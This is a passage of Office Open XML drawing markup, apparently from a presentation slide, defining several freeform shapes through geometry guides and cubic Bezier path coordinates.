                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FC49C16-83E6-5B43-88F7-32A690BEBAC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0337399" y="12498411"/>
                  <a:ext cx="965200" cy="274638"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 189 w 228"/>
                    <a:gd name="T1" fmla="*/ 65 h 65"/>
                    <a:gd name="T2" fmla="*/ 210 w 228"/>
                    <a:gd name="T3" fmla="*/ 43 h 65"/>
                    <a:gd name="T4" fmla="*/ 189 w 228"/>
                    <a:gd name="T5" fmla="*/ 65 h 65"/>
                    <a:gd name="T6" fmla="*/ 228 w 228"/>
                    <a:gd name="T7" fmla="*/ 21 h 65"/>
                    <a:gd name="T8" fmla="*/ 145 w 228"/>
                    <a:gd name="T9" fmla="*/ 0 h 65"/>
                    <a:gd name="T10" fmla="*/ 38 w 228"/>
                    <a:gd name="T11" fmla="*/ 0 h 65"/>
                    <a:gd name="T12" fmla="*/ 0 w 228"/>
                    <a:gd name="T13" fmla="*/ 56 h 65"/>
                    <a:gd name="T14" fmla="*/ 145 w 228"/>
                    <a:gd name="T15" fmla="*/ 56 h 65"/>
                    <a:gd name="T16" fmla="*/ 182 w 228"/>
                    <a:gd name="T17" fmla="*/ 62 h 65"/>
                    <a:gd name="T18" fmla="*/ 228 w 228"/>
                    <a:gd name="T19" fmla="*/ 21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28" h="65">
                      <a:moveTo>
                        <a:pt x="189" y="65"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="57"/>
                        <a:pt x="202" y="50"/>
                        <a:pt x="210" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="50"/>
                        <a:pt x="195" y="57"/>
                        <a:pt x="189" y="65"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="228" y="21"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="8"/>
                        <a:pt x="175" y="0"/>
                        <a:pt x="145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23" y="17"/>
                        <a:pt x="10" y="36"/>
                        <a:pt x="0" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="56"/>
                        <a:pt x="145" y="56"/>
                        <a:pt x="145" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="158" y="56"/>
                        <a:pt x="171" y="58"/>
                        <a:pt x="182" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="46"/>
                        <a:pt x="210" y="32"/>
                        <a:pt x="22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67" name="Freeform 166">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8FD2C5-2991-E449-873C-87DA9F37C95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0337399" y="12793686"/>
                  <a:ext cx="1343025" cy="1162050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 237 w 317"/>
                    <a:gd name="T1" fmla="*/ 24 h 274"/>
                    <a:gd name="T2" fmla="*/ 234 w 317"/>
                    <a:gd name="T3" fmla="*/ 28 h 274"/>
                    <a:gd name="T4" fmla="*/ 234 w 317"/>
                    <a:gd name="T5" fmla="*/ 28 h 274"/>
                    <a:gd name="T6" fmla="*/ 237 w 317"/>
                    <a:gd name="T7" fmla="*/ 24 h 274"/>
                    <a:gd name="T8" fmla="*/ 284 w 317"/>
                    <a:gd name="T9" fmla="*/ 0 h 274"/>
                    <a:gd name="T10" fmla="*/ 239 w 317"/>
                    <a:gd name="T11" fmla="*/ 33 h 274"/>
                    <a:gd name="T12" fmla="*/ 261 w 317"/>
                    <a:gd name="T13" fmla="*/ 102 h 274"/>
                    <a:gd name="T14" fmla="*/ 234 w 317"/>
                    <a:gd name="T15" fmla="*/ 176 h 274"/>
                    <a:gd name="T16" fmla="*/ 232 w 317"/>
                    <a:gd name="T17" fmla="*/ 179 h 274"/>
                    <a:gd name="T18" fmla="*/ 230 w 317"/>
                    <a:gd name="T19" fmla="*/ 181 h 274"/>
                    <a:gd name="T20" fmla="*/ 229 w 317"/>
                    <a:gd name="T21" fmla="*/ 182 h 274"/>
                    <a:gd name="T22" fmla="*/ 226 w 317"/>
                    <a:gd name="T23" fmla="*/ 185 h 274"/>
                    <a:gd name="T24" fmla="*/ 224 w 317"/>
                    <a:gd name="T25" fmla="*/ 187 h 274"/>
                    <a:gd name="T26" fmla="*/ 222 w 317"/>
                    <a:gd name="T27" fmla="*/ 188 h 274"/>
                    <a:gd name="T28" fmla="*/ 221 w 317"/>
                    <a:gd name="T29" fmla="*/ 190 h 274"/>
                    <a:gd name="T30" fmla="*/ 217 w 317"/>
                    <a:gd name="T31" fmla="*/ 193 h 274"/>
                    <a:gd name="T32" fmla="*/ 216 w 317"/>
                    <a:gd name="T33" fmla="*/ 194 h 274"/>
                    <a:gd name="T34" fmla="*/ 214 w 317"/>
                    <a:gd name="T35" fmla="*/ 195 h 274"/>
                    <a:gd name="T36" fmla="*/ 213 w 317"/>
                    <a:gd name="T37" fmla="*/ 196 h 274"/>
                    <a:gd name="T38" fmla="*/ 208 w 317"/>
                    <a:gd name="T39" fmla="*/ 199 h 274"/>
                    <a:gd name="T40" fmla="*/ 207 w 317"/>
                    <a:gd name="T41" fmla="*/ 200 h 274"/>
                    <a:gd name="T42" fmla="*/ 202 w 317"/>
                    <a:gd name="T43" fmla="*/ 203 h 274"/>
                    <a:gd name="T44" fmla="*/ 202 w 317"/>
                    <a:gd name="T45" fmla="*/ 203 h 274"/>
                    <a:gd name="T46" fmla="*/ 199 w 317"/>
                    <a:gd name="T47" fmla="*/ 205 h 274"/>
                    <a:gd name="T48" fmla="*/ 198 w 317"/>
                    <a:gd name="T49" fmla="*/ 205 h 274"/>
                    <a:gd name="T50" fmla="*/ 193 w 317"/>
                    <a:gd name="T51" fmla="*/ 208 h 274"/>
                    <a:gd name="T52" fmla="*/ 192 w 317"/>
                    <a:gd name="T53" fmla="*/ 208 h 274"/>
                    <a:gd name="T54" fmla="*/ 145 w 317"/>
                    <a:gd name="T55" fmla="*/ 218 h 274"/>
                    <a:gd name="T56" fmla="*/ 0 w 317"/>
                    <a:gd name="T57" fmla="*/ 218 h 274"/>
                    <a:gd name="T58" fmla="*/ 38 w 317"/>
                    <a:gd name="T59" fmla="*/ 274 h 274"/>
                    <a:gd name="T60" fmla="*/ 145 w 317"/>
                    <a:gd name="T61" fmla="*/ 274 h 274"/>
                    <a:gd name="T62" fmla="*/ 317 w 317"/>
                    <a:gd name="T63" fmla="*/ 102 h 274"/>
                    <a:gd name="T64" fmla="*/ 284 w 317"/>
                    <a:gd name="T65" fmla="*/ 0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317" h="274">
                      <a:moveTo>
                        <a:pt x="237" y="24"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="236" y="26"/>
                        <a:pt x="235" y="27"/>
                        <a:pt x="234" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="234" y="28"/>
                        <a:pt x="234" y="28"/>
                        <a:pt x="234" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="27"/>
                        <a:pt x="236" y="26"/>
                        <a:pt x="237" y="24"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="284" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="266" y="7"/>
                        <a:pt x="250" y="19"/>
                        <a:pt x="239" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="253" y="52"/>
                        <a:pt x="261" y="76"/>
                        <a:pt x="261" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="261" y="130"/>
                        <a:pt x="251" y="156"/>
                        <a:pt x="234" y="176"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="233" y="177"/>
                        <a:pt x="233" y="178"/>
                        <a:pt x="232" y="179"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="231" y="180"/>
                        <a:pt x="231" y="180"/>
                        <a:pt x="230" y="181"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="181"/>
                        <a:pt x="229" y="182"/>
                        <a:pt x="229" y="182"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="228" y="183"/>
                        <a:pt x="227" y="184"/>
                        <a:pt x="226" y="185"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="186"/>
                        <a:pt x="225" y="186"/>
                        <a:pt x="224" y="187"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="224" y="187"/>
                        <a:pt x="223" y="188"/>
                        <a:pt x="222" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="189"/>
                        <a:pt x="221" y="189"/>
                        <a:pt x="221" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="220" y="191"/>
                        <a:pt x="219" y="192"/>
                        <a:pt x="217" y="193"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="193"/>
                        <a:pt x="217" y="193"/>
                        <a:pt x="216" y="194"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="215" y="194"/>
                        <a:pt x="215" y="195"/>
                        <a:pt x="214" y="195"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="214" y="195"/>
                        <a:pt x="214" y="196"/>
                        <a:pt x="213" y="196"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="212" y="197"/>
                        <a:pt x="210" y="198"/>
                        <a:pt x="208" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="208" y="199"/>
                        <a:pt x="208" y="200"/>
                        <a:pt x="207" y="200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="206" y="201"/>
                        <a:pt x="204" y="202"/>
                        <a:pt x="202" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="203"/>
                        <a:pt x="202" y="203"/>
                        <a:pt x="202" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="201" y="204"/>
                        <a:pt x="200" y="204"/>
                        <a:pt x="199" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="205"/>
                        <a:pt x="199" y="205"/>
                        <a:pt x="198" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="206"/>
                        <a:pt x="195" y="207"/>
                        <a:pt x="193" y="208"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="208"/>
                        <a:pt x="192" y="208"/>
                        <a:pt x="192" y="208"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="214"/>
                        <a:pt x="162" y="218"/>
                        <a:pt x="145" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="218"/>
                        <a:pt x="0" y="218"/>
                        <a:pt x="0" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="238"/>
                        <a:pt x="23" y="257"/>
                        <a:pt x="38" y="274"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="274"/>
                        <a:pt x="145" y="274"/>
                        <a:pt x="145" y="274"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="274"/>
                        <a:pt x="317" y="197"/>
                        <a:pt x="317" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="317" y="64"/>
                        <a:pt x="305" y="29"/>
                        <a:pt x="28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68" name="Freeform 167">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D21D0BD0-91E4-8643-BB77-E99521ED3AB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327999" y="13679511"/>
                  <a:ext cx="992188" cy="276225"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 46 w 234"/>
                    <a:gd name="T1" fmla="*/ 0 h 65"/>
                    <a:gd name="T2" fmla="*/ 25 w 234"/>
                    <a:gd name="T3" fmla="*/ 22 h 65"/>
                    <a:gd name="T4" fmla="*/ 46 w 234"/>
                    <a:gd name="T5" fmla="*/ 0 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 234"/>
                    <a:gd name="T7" fmla="*/ 40 h 65"/>
                    <a:gd name="T8" fmla="*/ 6 w 234"/>
                    <a:gd name="T9" fmla="*/ 36 h 65"/>
                    <a:gd name="T10" fmla="*/ 0 w 234"/>
                    <a:gd name="T11" fmla="*/ 40 h 65"/>
                    <a:gd name="T12" fmla="*/ 89 w 234"/>
                    <a:gd name="T13" fmla="*/ 9 h 65"/>
                    <a:gd name="T14" fmla="*/ 52 w 234"/>
                    <a:gd name="T15" fmla="*/ 3 h 65"/>
                    <a:gd name="T16" fmla="*/ 7 w 234"/>
                    <a:gd name="T17" fmla="*/ 44 h 65"/>
                    <a:gd name="T18" fmla="*/ 89 w 234"/>
                    <a:gd name="T19" fmla="*/ 65 h 65"/>
                    <a:gd name="T20" fmla="*/ 197 w 234"/>
                    <a:gd name="T21" fmla="*/ 65 h 65"/>
                    <a:gd name="T22" fmla="*/ 234 w 234"/>
                    <a:gd name="T23" fmla="*/ 9 h 65"/>
                    <a:gd name="T24" fmla="*/ 89 w 234"/>
                    <a:gd name="T25" fmla="*/ 9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4" h="65">
                      <a:moveTo>
                        <a:pt x="46" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="8"/>
                        <a:pt x="32" y="15"/>
                        <a:pt x="25" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="15"/>
                        <a:pt x="39" y="8"/>
                        <a:pt x="46" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="0" y="40"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="39"/>
                        <a:pt x="4" y="37"/>
                        <a:pt x="6" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="37"/>
                        <a:pt x="2" y="39"/>
                        <a:pt x="0" y="40"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="89" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="9"/>
                        <a:pt x="64" y="7"/>
                        <a:pt x="52" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="19"/>
                        <a:pt x="24" y="33"/>
                        <a:pt x="7" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="57"/>
                        <a:pt x="59" y="65"/>
                        <a:pt x="89" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="197" y="65"/>
                        <a:pt x="197" y="65"/>
                        <a:pt x="197" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="212" y="48"/>
                        <a:pt x="224" y="29"/>
                        <a:pt x="234" y="9"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="89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69" name="Freeform 168">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60C8EFC-9CF1-4F45-922C-D09B843AC9B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0977162" y="12498411"/>
                  <a:ext cx="1343025" cy="1181100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 73 w 317"/>
                    <a:gd name="T1" fmla="*/ 257 h 279"/>
                    <a:gd name="T2" fmla="*/ 71 w 317"/>
                    <a:gd name="T3" fmla="*/ 259 h 279"/>
                    <a:gd name="T4" fmla="*/ 71 w 317"/>
                    <a:gd name="T5" fmla="*/ 259 h 279"/>
                    <a:gd name="T6" fmla="*/ 71 w 317"/>
                    <a:gd name="T7" fmla="*/ 259 h 279"/>
                    <a:gd name="T8" fmla="*/ 71 w 317"/>
                    <a:gd name="T9" fmla="*/ 259 h 279"/>
                    <a:gd name="T10" fmla="*/ 70 w 317"/>
                    <a:gd name="T11" fmla="*/ 260 h 279"/>
                    <a:gd name="T12" fmla="*/ 79 w 317"/>
                    <a:gd name="T13" fmla="*/ 251 h 279"/>
                    <a:gd name="T14" fmla="*/ 78 w 317"/>
                    <a:gd name="T15" fmla="*/ 252 h 279"/>
                    <a:gd name="T16" fmla="*/ 63 w 317"/>
                    <a:gd name="T17" fmla="*/ 265 h 279"/>
                    <a:gd name="T18" fmla="*/ 62 w 317"/>
                    <a:gd name="T19" fmla="*/ 266 h 279"/>
                    <a:gd name="T20" fmla="*/ 83 w 317"/>
                    <a:gd name="T21" fmla="*/ 246 h 279"/>
                    <a:gd name="T22" fmla="*/ 83 w 317"/>
                    <a:gd name="T23" fmla="*/ 246 h 279"/>
                    <a:gd name="T24" fmla="*/ 83 w 317"/>
                    <a:gd name="T25" fmla="*/ 246 h 279"/>
                    <a:gd name="T26" fmla="*/ 83 w 317"/>
                    <a:gd name="T27" fmla="*/ 246 h 279"/>
                    <a:gd name="T28" fmla="*/ 41 w 317"/>
                    <a:gd name="T29" fmla="*/ 278 h 279"/>
                    <a:gd name="T30" fmla="*/ 38 w 317"/>
                    <a:gd name="T31" fmla="*/ 279 h 279"/>
                    <a:gd name="T32" fmla="*/ 172 w 317"/>
                    <a:gd name="T33" fmla="*/ 0 h 279"/>
                    <a:gd name="T34" fmla="*/ 34 w 317"/>
                    <a:gd name="T35" fmla="*/ 274 h 279"/>
                    <a:gd name="T36" fmla="*/ 39 w 317"/>
                    <a:gd name="T37" fmla="*/ 272 h 279"/>
                    <a:gd name="T38" fmla="*/ 44 w 317"/>
                    <a:gd name="T39" fmla="*/ 269 h 279"/>
                    <a:gd name="T40" fmla="*/ 45 w 317"/>
                    <a:gd name="T41" fmla="*/ 269 h 279"/>
                    <a:gd name="T42" fmla="*/ 48 w 317"/>
                    <a:gd name="T43" fmla="*/ 267 h 279"/>
                    <a:gd name="T44" fmla="*/ 54 w 317"/>
                    <a:gd name="T45" fmla="*/ 263 h 279"/>
                    <a:gd name="T46" fmla="*/ 59 w 317"/>
                    <a:gd name="T47" fmla="*/ 260 h 279"/>
                    <a:gd name="T48" fmla="*/ 61 w 317"/>
                    <a:gd name="T49" fmla="*/ 258 h 279"/>
                    <a:gd name="T50" fmla="*/ 65 w 317"/>
                    <a:gd name="T51" fmla="*/ 255 h 279"/>
                    <a:gd name="T52" fmla="*/ 67 w 317"/>
                    <a:gd name="T53" fmla="*/ 253 h 279"/>
                    <a:gd name="T54" fmla="*/ 70 w 317"/>
                    <a:gd name="T55" fmla="*/ 250 h 279"/>
                    <a:gd name="T56" fmla="*/ 74 w 317"/>
                    <a:gd name="T57" fmla="*/ 246 h 279"/>
                    <a:gd name="T58" fmla="*/ 78 w 317"/>
                    <a:gd name="T59" fmla="*/ 242 h 279"/>
                    <a:gd name="T60" fmla="*/ 56 w 317"/>
                    <a:gd name="T61" fmla="*/ 172 h 279"/>
                    <a:gd name="T62" fmla="*/ 317 w 317"/>
                    <a:gd name="T63" fmla="*/ 56 h 279"/>
                    <a:gd name="T64" fmla="*/ 42 w 317"/>
                    <a:gd name="T65" fmla="*/ 278 h 279"/>
                    <a:gd name="T66" fmla="*/ 41 w 317"/>
                    <a:gd name="T67" fmla="*/ 278 h 2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317" h="279">
                      <a:moveTo>
                        <a:pt x="71" y="258"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="258"/>
                        <a:pt x="73" y="257"/>
                        <a:pt x="73" y="257"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="256"/>
                        <a:pt x="74" y="256"/>
                        <a:pt x="75" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="257"/>
                        <a:pt x="72" y="258"/>
                        <a:pt x="71" y="259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="259"/>
                        <a:pt x="71" y="259"/>
                        <a:pt x="71" y="258"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="71" y="259"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="259"/>
                        <a:pt x="71" y="259"/>
                        <a:pt x="71" y="259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="259"/>
                        <a:pt x="71" y="259"/>
                        <a:pt x="71" y="259"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="70" y="260"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="260"/>
                        <a:pt x="70" y="259"/>
                        <a:pt x="71" y="259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="260"/>
                        <a:pt x="68" y="261"/>
                        <a:pt x="66" y="263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="262"/>
                        <a:pt x="69" y="261"/>
                        <a:pt x="70" y="260"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="78" y="252"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="252"/>
                        <a:pt x="79" y="251"/>
                        <a:pt x="79" y="251"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="252"/>
                        <a:pt x="76" y="254"/>
                        <a:pt x="75" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="254"/>
                        <a:pt x="77" y="253"/>
                        <a:pt x="78" y="252"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="62" y="266"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="266"/>
                        <a:pt x="63" y="265"/>
                        <a:pt x="63" y="265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="267"/>
                        <a:pt x="59" y="268"/>
                        <a:pt x="57" y="269"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="268"/>
                        <a:pt x="61" y="267"/>
                        <a:pt x="62" y="266"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="83" y="246"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="83" y="246"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                        <a:pt x="83" y="246"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="247"/>
                        <a:pt x="82" y="248"/>
                        <a:pt x="81" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="248"/>
                        <a:pt x="82" y="247"/>
                        <a:pt x="83" y="246"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="38" y="279"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="279"/>
                        <a:pt x="40" y="278"/>
                        <a:pt x="41" y="278"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="278"/>
                        <a:pt x="39" y="279"/>
                        <a:pt x="38" y="279"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="279"/>
                        <a:pt x="38" y="279"/>
                        <a:pt x="38" y="279"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="280" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="0"/>
                        <a:pt x="172" y="0"/>
                        <a:pt x="172" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="0"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="0" y="172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="210"/>
                        <a:pt x="13" y="245"/>
                        <a:pt x="34" y="274"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="273"/>
                        <a:pt x="37" y="272"/>
                        <a:pt x="38" y="272"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="272"/>
                        <a:pt x="39" y="272"/>
                        <a:pt x="39" y="272"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="271"/>
                        <a:pt x="39" y="271"/>
                        <a:pt x="39" y="271"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="271"/>
                        <a:pt x="43" y="270"/>
                        <a:pt x="44" y="269"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="269"/>
                        <a:pt x="44" y="269"/>
                        <a:pt x="44" y="269"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="269"/>
                        <a:pt x="45" y="269"/>
                        <a:pt x="45" y="269"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="268"/>
                        <a:pt x="47" y="268"/>
                        <a:pt x="48" y="267"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="267"/>
                        <a:pt x="48" y="267"/>
                        <a:pt x="48" y="267"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="266"/>
                        <a:pt x="51" y="265"/>
                        <a:pt x="53" y="264"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="264"/>
                        <a:pt x="53" y="264"/>
                        <a:pt x="54" y="263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="262"/>
                        <a:pt x="57" y="261"/>
                        <a:pt x="59" y="260"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="260"/>
                        <a:pt x="59" y="260"/>
                        <a:pt x="59" y="260"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="260"/>
                        <a:pt x="59" y="260"/>
                        <a:pt x="59" y="260"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="259"/>
                        <a:pt x="60" y="259"/>
                        <a:pt x="61" y="258"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="258"/>
                        <a:pt x="62" y="258"/>
                        <a:pt x="62" y="257"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="256"/>
                        <a:pt x="64" y="256"/>
                        <a:pt x="65" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="255"/>
                        <a:pt x="66" y="255"/>
                        <a:pt x="66" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="254"/>
                        <a:pt x="66" y="254"/>
                        <a:pt x="67" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="253"/>
                        <a:pt x="68" y="252"/>
                        <a:pt x="69" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="251"/>
                        <a:pt x="70" y="251"/>
                        <a:pt x="70" y="250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="249"/>
                        <a:pt x="72" y="249"/>
                        <a:pt x="73" y="248"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="247"/>
                        <a:pt x="74" y="247"/>
                        <a:pt x="74" y="246"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="246"/>
                        <a:pt x="75" y="245"/>
                        <a:pt x="76" y="244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="244"/>
                        <a:pt x="77" y="243"/>
                        <a:pt x="78" y="242"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="242"/>
                        <a:pt x="79" y="241"/>
                        <a:pt x="79" y="241"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="221"/>
                        <a:pt x="56" y="198"/>
                        <a:pt x="56" y="172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="108"/>
                        <a:pt x="108" y="56"/>
                        <a:pt x="172" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
